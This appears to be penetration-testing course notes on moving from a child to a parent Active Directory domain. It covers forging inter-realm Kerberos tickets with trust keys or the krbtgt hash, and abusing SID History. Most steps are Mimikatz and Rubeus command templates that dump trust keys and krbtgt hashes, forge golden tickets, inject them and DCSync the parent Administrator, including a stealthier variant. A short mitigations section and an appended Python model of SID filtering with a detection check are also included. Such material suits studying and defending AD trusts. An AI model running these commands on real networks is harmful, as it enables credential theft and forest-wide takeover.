# Child to Parent Movement Across Trusts

Domains in the same forest have an explicit two-way trust between them. Between a parent and a child domain there are trust keys that can be used to move elsewhere within the forest.

There are two ways to take advantage of this:

1. Using Trust Tickets
2. Using krbtgt

If we obtain Domain Admin in a single domain, the security of the entire forest is at risk, because we can then move anywhere within it.

The attack is very similar to forging Silver or Golden Tickets. However, we must first obtain the trust key, i.e. the password shared between the two domains that maintains the trust.

Authentication is very similar to ordinary Kerberos authentication. The difference is that an extra step is taken to authenticate to the KDC of the other domain. This is necessary because a KDC cannot issue TGSs for services in another domain: the service credentials needed to create those tickets are stored on the other domain's DC.

The trust key acts as a middleman that allows the user to request a TGS in the other domain. The inter-realm TGT presented to the next domain is encrypted with this trust key rather than with the issuing DC's krbtgt password, and the TGS request to the next domain is then made with that ticket.

If there are more than two domains in a forest, the authentication procedure gets more complicated depending on the trust relationships within the forest.

![From PentesterAcademy.com](/files/H6m46q9kbYoN21ydcyRI)

## Using Trust Tickets to Move Laterally

### Step 1

* To forge these tickets we need the trust key, so we must find it first. This requires Admin privileges.

```powershell
# Dump the trust keys from the current domain's DC
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName <dc>

# The trust key is also the NTLM hash of the trust account for the parent domain
# (it looks like a machine account), so DCSync of that account works as well
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<current_domain>\<parent_DC_machine_account>"'
```

### Step 2

* Now that we have the trust key, we can forge an Inter-Realm TGT (this does not require Admin privileges). However, we first need the SID of the parent domain's Enterprise Admins group.

```powershell
# PowerView: look up the Enterprise Admins group in the parent domain and print its SID
Get-NetGroup -Domain <parent_domain> -FullData | select samaccountname,objectsid | ?{$_.samaccountname -match "Enterprise Admins"}
```

### Step 3

* Now we can forge the Inter-Realm TGT

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current_domain> /sid:<domain_SID> /sids:<enterprise_admin_SID> /rc4:<trust_key> /service:krbtgt /target:<parent_domain> /ticket:C:\path\to\new\ticket.kirbi"'
```

### Step 4

* Then use the trust ticket to request a TGS for a service in the parent domain

```powershell
# asktgs.exe
asktgs.exe <trust_ticket.kirbi> <service>/<parent_domain>
# example
asktgs.exe .\trust_ticket1.kirbi CIFS/parentDC.bizcorp.local
```

### Step 5

* Then inject the service ticket obtained in the previous step

```powershell
# kirbikator.exe
kirbikator.exe lsa .\<service_ticket_to_parent.kirbi>
```

### Step 6

* Now check our access to the parent

```powershell
# If the ticket was requested for CIFS...
ls \\parent.DC\C$
# If it was requested for WMI (HOST/RPCSS)
Get-WmiObject Win32_Processor -ComputerName <parent.dc>
```

### Steps 4 and 5 Can Also Be Done with Rubeus.exe

```powershell
.\Rubeus.exe asktgs /ticket:<TGT_trust_ticket.kirbi> /service:<service>/<parent_DC> /dc:<parent_DC> /ptt
```

## Using krbtgt to Move Laterally

### Method 1 - Abusing SID History to Escalate to Enterprise Admin

* Step 1 - Make sure you have the krbtgt hash of the current (child) domain

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

* Step 2 - Create an Inter-Realm TGT with the parent's Enterprise Admins SID in SID History

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<parent_enterprise_admin_sid> /krbtgt:<krbtgt_hash> /ticket:C:\path\to\ticket.kirbi"'
```

* Step 3 - Inject the Ticket

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'
```

* Step 4 - Check the Injection

```powershell
ls \\<parent_DC>\C$
```

### Method 2 - The Quieter Way, Using the Domain Controllers Group SID and the Enterprise Domain Controllers SID

* First, get the SID of the parent domain's Domain Controllers group

```powershell
Get-NetGroup -Domain <parent_domain> -FullData | select samaccountname,objectsid | ?{$_.samaccountname -eq "Domain Controllers"}
```

* Then create the ticket as the current DC's machine account, with the parent's Domain Controllers SID and Enterprise Domain Controllers (S-1-5-9) in SID History

```powershell
# /groups:516 = Domain Controllers of the current domain; S-1-5-9 = Enterprise Domain Controllers
Invoke-Mimikatz -Command '"kerberos::golden /user:<current_DC_machine_account> /domain:<current_domain> /sid:<current_domain_sid> /groups:516 /sids:<parent_DC_sid>,S-1-5-9 /krbtgt:<krbtgt_hash> /ptt"'
```

* Now you can DCSync to get the parent DC Administrator hash

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<parent_domain>\Administrator /domain:<parent_domain>"'
```

### Mitigations

Since intra-forest trusts are considered secure by default, there is no really effective defense mechanism against this.

What can be done is to change the krbtgt and machine account passwords often in order to limit persistence within the network. However, the best thing to do is to protect the domain controllers from any outside intrusion or code execution.
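The reason SID History works across a child-to-parent trust is that SID filtering is not applied inside a forest, so the parent KDC honours every SID in the PAC's ExtraSids field. The following Python model, added here and not part of the original notes, shows a simplified version of that filtering decision and a detection check for the forged-ticket shape used in both methods above (privileged SIDs of another domain in ExtraSids). The domain SIDs are constructed sample values and the filtering rules are a simplification of the Netlogon rules, not a full implementation.

```python
# Added example: simplified model of SID filtering on an inter-realm ticket's
# PAC, and a detection helper for ExtraSids that name another domain's
# privileged groups. Domain SIDs are constructed, not real identifiers.
from dataclasses import dataclass
from typing import List, Optional

CHILD_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed child domain SID
PARENT_SID = "S-1-5-21-4444444444-5555555555-6666666666"  # constructed parent domain SID
ENTERPRISE_DCS = "S-1-5-9"          # well-known Enterprise Domain Controllers SID
PRIVILEGED_RIDS = {512, 516, 519}   # Domain Admins, Domain Controllers, Enterprise Admins


def domain_of(sid: str) -> str:
    """Domain part of a S-1-5-21-... SID (everything but the RID); well-known SIDs are returned whole."""
    return sid.rsplit("-", 1)[0] if sid.startswith("S-1-5-21-") else sid


def rid_of(sid: str) -> Optional[int]:
    """RID of a S-1-5-21-... SID, or None for well-known SIDs such as S-1-5-9."""
    return int(sid.rsplit("-", 1)[1]) if sid.startswith("S-1-5-21-") else None


@dataclass
class Pac:
    user_sid: str
    group_sids: List[str]
    extra_sids: List[str]   # SID History, i.e. the /sids: field of a forged ticket


def filter_sids(trusted_domain_sid: str, pac: Pac, sid_filtering: bool) -> List[str]:
    """SIDs the trusting KDC will honour. With SID filtering (default on forest and
    external trusts) SIDs not issued by the trusted domain, and the always-filtered
    S-1-5-9, are dropped. Intra-forest trusts do not filter, so ExtraSids pass through."""
    all_sids = [pac.user_sid] + list(pac.group_sids) + list(pac.extra_sids)
    if not sid_filtering:
        return all_sids
    return [s for s in all_sids if domain_of(s) == trusted_domain_sid and s != ENTERPRISE_DCS]


def foreign_privileged_sids(trusted_domain_sid: str, pac: Pac) -> List[str]:
    """Detection helper: ExtraSids naming privileged groups of another domain.
    Legitimate SID History of a migrated user never contains the parent's
    Enterprise Admins or Domain Controllers SIDs, nor S-1-5-9."""
    return [s for s in pac.extra_sids
            if domain_of(s) != trusted_domain_sid
            and (rid_of(s) in PRIVILEGED_RIDS or s == ENTERPRISE_DCS)]


# Forged PAC in the shape of Method 1: child Administrator (RID 500) carrying the
# parent's Enterprise Admins SID (RID 519) in ExtraSids.
FORGED_PAC = Pac(user_sid=CHILD_SID + "-500",
                 group_sids=[CHILD_SID + "-512", CHILD_SID + "-513"],
                 extra_sids=[PARENT_SID + "-519"])


def effective_sids(sid_filtering: bool) -> List[str]:
    """SIDs the parent KDC would honour for FORGED_PAC under the given trust setting."""
    return filter_sids(CHILD_SID, FORGED_PAC, sid_filtering)


if __name__ == "__main__":
    print("intra-forest (no SID filtering):", effective_sids(False))
    print("with SID filtering enabled:     ", effective_sids(True))
    print("foreign privileged ExtraSids:   ", foreign_privileged_sids(CHILD_SID, FORGED_PAC))
```

Without filtering the parent's RID 519 SID survives into the token, which is the whole attack; with filtering it is stripped, which is why this protection exists only at forest boundaries.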
